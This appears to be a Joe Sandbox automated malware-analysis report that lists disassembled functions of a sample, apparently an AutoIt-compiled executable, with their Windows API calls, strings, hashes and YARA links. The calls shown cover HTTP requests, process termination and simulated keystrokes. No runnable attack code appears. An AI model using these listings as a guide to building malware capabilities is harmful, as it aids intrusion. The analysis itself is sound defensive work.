Opcode Fuzzy Hash: 4a1980aa4b774f3f4e7d1e130bb4af6f0ff98df6ed8f61d5c4f2c279adb2809e
Instruction Fuzzy Hash: B0519071C1064ABBCF15EBA1DC46EEEBB78EF24341F544125F505720A2EB301AA9DF64

Function 0025C253 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 94networkCOMMON

Download Yara Rule

APIs

InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0025C272
HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0025C29A
HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 0025C2CA
GetLastError.KERNEL32 ref: 0025C322
SetEvent.KERNEL32(?), ref: 0025C336
InternetCloseHandle.WININET(00000000), ref: 0025C341

Strings

, xrefs: 0025C2BB

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: HttpInternet$CloseErrorEventHandleInfoLastOpenQueryRequestSend
String ID:
API String ID: 3113390036-3916222277
Opcode ID: 16125e13a1d83247313befead0660b9ac60cdfcc038d0c75cb6e83bd773ef3b4
Instruction ID: d8c608e750e2934d2c41f837e2bed63f00731ff5d87d4e1d0a6439b8471f3779
Opcode Fuzzy Hash: 16125e13a1d83247313befead0660b9ac60cdfcc038d0c75cb6e83bd773ef3b4
Instruction Fuzzy Hash: B0319171520308BFD7219F64DC88A6B7BFCEB49741F20855EF846D2201EB70DD588B64

Function 0024989B Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 74windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,00223AAF,?,?,Bad directive syntax error,0027CC08,00000000,00000010,?,?,>>>AUTOIT SCRIPT<<<), ref: 002498BC
LoadStringW.USER32(00000000,?,00223AAF,?), ref: 002498C3

Part of subcall function 001E9CB3: _wcslen.LIBCMT ref: 001E9CBD

MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 00249987

Strings

Line %d:, xrefs: 00249912
%s (%d) : ==> %s.: %s %s, xrefs: 002498F1
Line %d (File "%s"):, xrefs: 0024992D
., xrefs: 0024996D
Error: , xrefs: 00249955

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: HandleLoadMessageModuleString_wcslen
String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
API String ID: 858772685-4153970271
Opcode ID: 34351ff9ac0195dce3f1075b61a8511449a92d450f2fa27d5a1e9b9179ff1239
Instruction ID: be05a081cd8dfbcf5ca35c15b58198cdc890c35e00ea16136918f9fee6668054
Opcode Fuzzy Hash: 34351ff9ac0195dce3f1075b61a8511449a92d450f2fa27d5a1e9b9179ff1239
Instruction Fuzzy Hash: FD217431C1025EBBCF15AF90DC0AEEE7775FF29700F044459F515660A1EB719A68DB50

Function 0024209F Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 71windowCOMMON

Download Yara Rule

APIs

GetParent.USER32 ref: 002420AB
GetClassNameW.USER32(00000000,?,00000100), ref: 002420C0
SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 0024214D

Strings

details, xrefs: 002420FB
list, xrefs: 0024212F
largeicons, xrefs: 002420E1
SHELLDLL_DefView, xrefs: 002420CC
smallicons, xrefs: 00242115

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: ClassMessageNameParentSend
String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
API String ID: 1290815626-3381328864
Opcode ID: c4b899c5a416d09a8b401efb04a5449947c23a8a26b454395dc34d44e06bfe2d
Instruction ID: 44a0f58a795f4544605284f1188fb7fe9dc03402c7f3ae1e7bf02cfd42ad99eb
Opcode Fuzzy Hash: c4b899c5a416d09a8b401efb04a5449947c23a8a26b454395dc34d44e06bfe2d
Instruction Fuzzy Hash: BF1127762B8317FAF7093625AC0BDA7339CCB06325B70001AFB0CA40D3EEA558755A24

Function 0021CE90 Relevance: 13.7, APIs: 9, Instructions: 209COMMON

Download Yara Rule

APIs

___from_strstr_to_strchr.LIBCMT ref: 0021CEB7
_free.LIBCMT ref: 0021CF22
_free.LIBCMT ref: 0021CF48
_free.LIBCMT ref: 0021CF71
_free.LIBCMT ref: 0021CFA9
_free.LIBCMT ref: 0021CFDA
_free.LIBCMT ref: 0021D01B
SetEnvironmentVariableA.KERNEL32(00000000,00000000), ref: 0021D09C
_free.LIBCMT ref: 0021D0B5

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: _free$EnvironmentVariable___from_strstr_to_strchr
String ID:
API String ID: 1282221369-0
Opcode ID: 86c3a0f5443440df310f30df7a8d5f4f05379c8e27a444da52e06e8ae3d50c87
Instruction ID: a580376edef49e3db45ac5a0dd72e60b94f44b2abadedd6c9039ac98f0d9c8b9
Opcode Fuzzy Hash: 86c3a0f5443440df310f30df7a8d5f4f05379c8e27a444da52e06e8ae3d50c87
Instruction Fuzzy Hash: 7661AD75964306EFDB21AFB49885AEA7BD5EF25320F24016EF80497281D7319CF2CB90

Function 001F8B06 Relevance: 13.7, APIs: 9, Instructions: 155windowCOMMON

Download Yara Rule

APIs

LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 00236890
ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 002368A9
LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 002368B9
ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 002368D1
SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 002368F2
DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,001F8874,00000000,00000000,00000000,000000FF,00000000), ref: 00236901
SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0023691E
DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,001F8874,00000000,00000000,00000000,000000FF,00000000), ref: 0023692D

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: Icon$DestroyExtractImageLoadMessageSend
String ID:
API String ID: 1268354404-0
Opcode ID: 2ca86a3a1ff3d8d47cf7974533506d9cc7943f3b5e140c28202a6dd264181410
Instruction ID: 6dc1dcc11b6cfbe9e6d2cc7849549409319c694ea567ef7a3f57d5d491bac7da
Opcode Fuzzy Hash: 2ca86a3a1ff3d8d47cf7974533506d9cc7943f3b5e140c28202a6dd264181410
Instruction Fuzzy Hash: C451AAB0610209EFDB24CF24DC99FAA7BB9FB58350F104518FA16972A0DB70E9A0CB50

Function 0025C143 Relevance: 13.6, APIs: 9, Instructions: 95networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 0025C182
GetLastError.KERNEL32 ref: 0025C195
SetEvent.KERNEL32(?), ref: 0025C1A9

Part of subcall function 0025C253: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0025C272
Part of subcall function 0025C253: GetLastError.KERNEL32 ref: 0025C322
Part of subcall function 0025C253: SetEvent.KERNEL32(?), ref: 0025C336
Part of subcall function 0025C253: InternetCloseHandle.WININET(00000000), ref: 0025C341

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
String ID:
API String ID: 337547030-0
Opcode ID: 908599b0d8384ac00e709fd7c0eb57b047cdc55383ba0ec1c3679001398ca352
Instruction ID: 0a9b2dd0f658427c21628810e7adffca8da6f2f7cd99aeea8200d9cffa76a3cb
Opcode Fuzzy Hash: 908599b0d8384ac00e709fd7c0eb57b047cdc55383ba0ec1c3679001398ca352
Instruction Fuzzy Hash: 51317071110701AFDB219FB5EC48A66BBE9FF58302F20441DFD5AC6611E730E8689F64

Function 002425A2 Relevance: 13.6, APIs: 9, Instructions: 60sleepkeyboardwindowCOMMON

Download Yara Rule

APIs

Part of subcall function 00243A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00243A57
Part of subcall function 00243A3D: GetCurrentThreadId.KERNEL32 ref: 00243A5E
Part of subcall function 00243A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,002425B3), ref: 00243A65

MapVirtualKeyW.USER32(00000025,00000000), ref: 002425BD
PostMessageW.USER32(?,00000100,00000025,00000000), ref: 002425DB
Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 002425DF
MapVirtualKeyW.USER32(00000025,00000000), ref: 002425E9
PostMessageW.USER32(?,00000100,00000027,00000000), ref: 00242601
Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 00242605
MapVirtualKeyW.USER32(00000025,00000000), ref: 0024260F
PostMessageW.USER32(?,00000101,00000027,00000000), ref: 00242623
Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 00242627

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
String ID:
API String ID: 2014098862-0
Opcode ID: b49dd50b3d814508542e15f139cbf945f3be86df5e12fe0bef3cccd6e8b216dc
Instruction ID: 9839f308120210b922dc4b384c5ea4b52f7f35ed5033ea7af61dc35255f4f01d
Opcode Fuzzy Hash: b49dd50b3d814508542e15f139cbf945f3be86df5e12fe0bef3cccd6e8b216dc
Instruction Fuzzy Hash: 3201B530790220BBFB1467799C8EF593E59DB4AB11F600015F31CAE0D1C9E11494CA69

Function 00241803 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,00241449,?,?,00000000), ref: 0024180C
HeapAlloc.KERNEL32(00000000,?,00241449,?,?,00000000), ref: 00241813
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00241449,?,?,00000000), ref: 00241828
GetCurrentProcess.KERNEL32(?,00000000,?,00241449,?,?,00000000), ref: 00241830
DuplicateHandle.KERNEL32(00000000,?,00241449,?,?,00000000), ref: 00241833
GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,00241449,?,?,00000000), ref: 00241843
GetCurrentProcess.KERNEL32(00241449,00000000,?,00241449,?,?,00000000), ref: 0024184B
DuplicateHandle.KERNEL32(00000000,?,00241449,?,?,00000000), ref: 0024184E
CreateThread.KERNEL32(00000000,00000000,00241874,00000000,00000000,00000000), ref: 00241868

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
String ID:
API String ID: 1957940570-0
Opcode ID: 8e188573c156dd044bc901a4f00057ef797ec20cda161ac40b38b82e33c1dbda
Instruction ID: 88217dd1e7b893645a131e485d1e395d9ec27f9e34bc3482b03388acbd3a0e4f
Opcode Fuzzy Hash: 8e188573c156dd044bc901a4f00057ef797ec20cda161ac40b38b82e33c1dbda
Instruction Fuzzy Hash: 4D01CDB5240308BFE710AFB5EC4DF6B3BACEB89B11F504425FA09DB1A1CA709850CB20

Function 0026A0E2 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 160COMMON

Download Yara Rule

APIs

Part of subcall function 0024D4DC: CreateToolhelp32Snapshot.KERNEL32 ref: 0024D501
Part of subcall function 0024D4DC: Process32FirstW.KERNEL32(00000000,?), ref: 0024D50F
Part of subcall function 0024D4DC: CloseHandle.KERNEL32(00000000), ref: 0024D5DC

OpenProcess.KERNEL32(00000001,00000000,?), ref: 0026A16D
GetLastError.KERNEL32 ref: 0026A180
OpenProcess.KERNEL32(00000001,00000000,?), ref: 0026A1B3
TerminateProcess.KERNEL32(00000000,00000000), ref: 0026A268
GetLastError.KERNEL32(00000000), ref: 0026A273
CloseHandle.KERNEL32(00000000), ref: 0026A2C4

Strings

SeDebugPrivilege, xrefs: 0026A18F

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
String ID: SeDebugPrivilege
API String ID: 2533919879-2896544425
Opcode ID: 5de71bbdfb6f9b996aa80d7bfa039219b2320e088961c381aaec63f7b8f3b886
Instruction ID: e198b9c13ae7cba60d54aeaff038475297127c0e722ec39ce6395fc8bf4bc01e
Opcode Fuzzy Hash: 5de71bbdfb6f9b996aa80d7bfa039219b2320e088961c381aaec63f7b8f3b886
Instruction Fuzzy Hash: 8461C0302146429FD320DF19C894F1ABBE1AF54318F54849CE86A9B7A3C772EC95CF92

Function 00273886 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 141windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00273925
SendMessageW.USER32(00000000,00001036,00000000,?), ref: 0027393A
SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00273954
_wcslen.LIBCMT ref: 00273999
SendMessageW.USER32(?,00001057,00000000,?), ref: 002739C6
SendMessageW.USER32(?,00001061,?,0000000F), ref: 002739F4

Strings

SysListView32, xrefs: 002738F7

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: MessageSend$Window_wcslen
String ID: SysListView32
API String ID: 2147712094-78025650
Opcode ID: 401f2acc16eb9076813f2529f4f5e966adeb52e2fe9bfd032119df9b351e0177
Instruction ID: 10b4c2565f7fd9c5a639897a1331d6bbd48e73924e3dbbcdef6c4526e23569db
Opcode Fuzzy Hash: 401f2acc16eb9076813f2529f4f5e966adeb52e2fe9bfd032119df9b351e0177
Instruction Fuzzy Hash: B541C371A10319ABEB21DF64CC49BEA77A9EF08350F10452AF95CE7281D7719AA0DB90

Function 0024BC5E Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 137windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 0024BCFD
IsMenu.USER32(00000000), ref: 0024BD1D
CreatePopupMenu.USER32 ref: 0024BD53
GetMenuItemCount.USER32(01055730), ref: 0024BDA4
InsertMenuItemW.USER32(01055730,?,00000001,00000030), ref: 0024BDCC

Strings

0, xrefs: 0024BCA8
2, xrefs: 0024BD37

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: Menu$Item$CountCreateInfoInsertPopup
String ID: 0$2
API String ID: 93392585-3793063076
Opcode ID: 0ba5932a2279607ecd6498d7a41402084470404666967934f9552265a6f1e476
Instruction ID: 24e40077cf65eed0e827e1f88fab5715ba9a72170a7d2b25e1e1fcc5ff970c47
Opcode Fuzzy Hash: 0ba5932a2279607ecd6498d7a41402084470404666967934f9552265a6f1e476
Instruction Fuzzy Hash: 6551BF70E20206DBDF2ACFB8D8C8BAEBBF4AF45314F244199E411A7290D7B0D965CB51

Function 00202D20 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117COMMON

Download Yara Rule

APIs

_ValidateLocalCookies.LIBCMT ref: 00202D4B
___except_validate_context_record.LIBVCRUNTIME ref: 00202D53
_ValidateLocalCookies.LIBCMT ref: 00202DE1
__IsNonwritableInCurrentImage.LIBCMT ref: 00202E0C
_ValidateLocalCookies.LIBCMT ref: 00202E61

Strings

csm, xrefs: 00202DF6
&H , xrefs: 00202DFE, 00202E07, 00202E18

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: &H $csm
API String ID: 1170836740-2339039177
Opcode ID: bf18ee05b2952543d94ee46e2cd267cfe120e47b583d965446ce63f82e19742a
Instruction ID: dbc6b1a402f65f4694786cc9ee216ef2a3f8139ce25cb6dc5bf85e0ca253bff8
Opcode Fuzzy Hash: bf18ee05b2952543d94ee46e2cd267cfe120e47b583d965446ce63f82e19742a
Instruction Fuzzy Hash: 49415434A20309EBCF10DF68C859A9EBBB5AF45314F148156E8146B3D3D771AE29CB90

Function 0024C874 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 81windowCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(00000000,00007F03), ref: 0024C913

Strings

blank, xrefs: 0024C895
stop, xrefs: 0024C8E4
question, xrefs: 0024C8CC
warning, xrefs: 0024C8FC
info, xrefs: 0024C8B4

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: IconLoad
String ID: blank$info$question$stop$warning
API String ID: 2457776203-404129466
Opcode ID: c9eaacec733ffca64cd2c339f12f58a4d14f5543427422c38d9f6ee2549249d5
Instruction ID: 85c3fdcefc4e8ac0025cf282fef562a6e506d9c24b5b414cf282eb967d3e366f
Opcode Fuzzy Hash: c9eaacec733ffca64cd2c339f12f58a4d14f5543427422c38d9f6ee2549249d5
Instruction Fuzzy Hash: 5C11EB327BA307BAE7096B5CDC83DBA679CDF16354B30402AF900A62C2EBF45D605664

Function 0024DE27 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 70networkCOMMON

Download Yara Rule

APIs

WSAStartup.WSOCK32(00000101,?), ref: 0024DE42
gethostname.WSOCK32(?,00000100), ref: 0024DE5C
gethostbyname.WSOCK32(?), ref: 0024DE69
inet_ntoa.WSOCK32(?), ref: 0024DEAB
_strcat.LIBCMT ref: 0024DEB9
WSACleanup.WSOCK32 ref: 0024DEDE

Strings

0.0.0.0, xrefs: 0024DE87

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
String ID: 0.0.0.0
API String ID: 642191829-3771769585
Opcode ID: 853861f24d1bcf1d87e34c10efdffc6b380ef73f708c41fef67663268003c856
Instruction ID: aeb0837b29b4753e6f870946a96ff3d08726c3f2543f4317add12bd41c2944c3
Opcode Fuzzy Hash: 853861f24d1bcf1d87e34c10efdffc6b380ef73f708c41fef67663268003c856
Instruction Fuzzy Hash: 29110A71924209AFDB287B70DC4AEEE776CDF11710F11016DF509A60D2EF708A918F50

Function 0024ED19 Relevance: 12.1, APIs: 8, Instructions: 137timeCOMMON

Download Yara Rule

APIs

GetLocalTime.KERNEL32 ref: 0024ED2A
_wcslen.LIBCMT ref: 0024ED3B
_wcslen.LIBCMT ref: 0024ED79
_wcslen.LIBCMT ref: 0024EDAF
_wcslen.LIBCMT ref: 0024EDDF
_wcslen.LIBCMT ref: 0024EDEF
_wcslen.LIBCMT ref: 0024EE2B
_wcslen.LIBCMT ref: 0024EE5A

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389078996.00000000002A2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389127821.00000000002AC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.3389148349.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1e0000_file.jbxd

Similarity

API ID: _wcslen$LocalTime
String ID:
API String ID: 952045576-0
Opcode ID: dbe2c7aeb96ded87fd69696121147d720963d5365ec852184f53614626019d65
Instruction ID: 8f55bc5cd06000cf7617435795f3f9cba943a762632b7f177e818c1f7fda3d32
Opcode Fuzzy Hash: dbe2c7aeb96ded87fd69696121147d720963d5365ec852184f53614626019d65
Instruction Fuzzy Hash: EA418365D20218B9DB11FBF4888AACFB7ACAF45710F508462E914E3163FB34D275C7A5

Function 001FF8D8 Relevance: 12.1, APIs: 8, Instructions: 124COMMON

Download Yara Rule

APIs

ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,0023682C,00000004,00000000,00000000), ref: 001FF953
ShowWindow.USER32(FFFFFFFF,00000006,?,00000000,?,0023682C,00000004,00000000,00000000), ref: 0023F3D1
ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,0023682C,00000004,00000000,00000000), ref: 0023F454

Memory Dump Source

Source File: 00000000.00000002.3389009689.00000000001E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001E0000, based on PE: true

Associated: 00000000.00000002.3388972060.00000000001E0000.00000002.00000001.01000000.00000003.sdmpDownload File
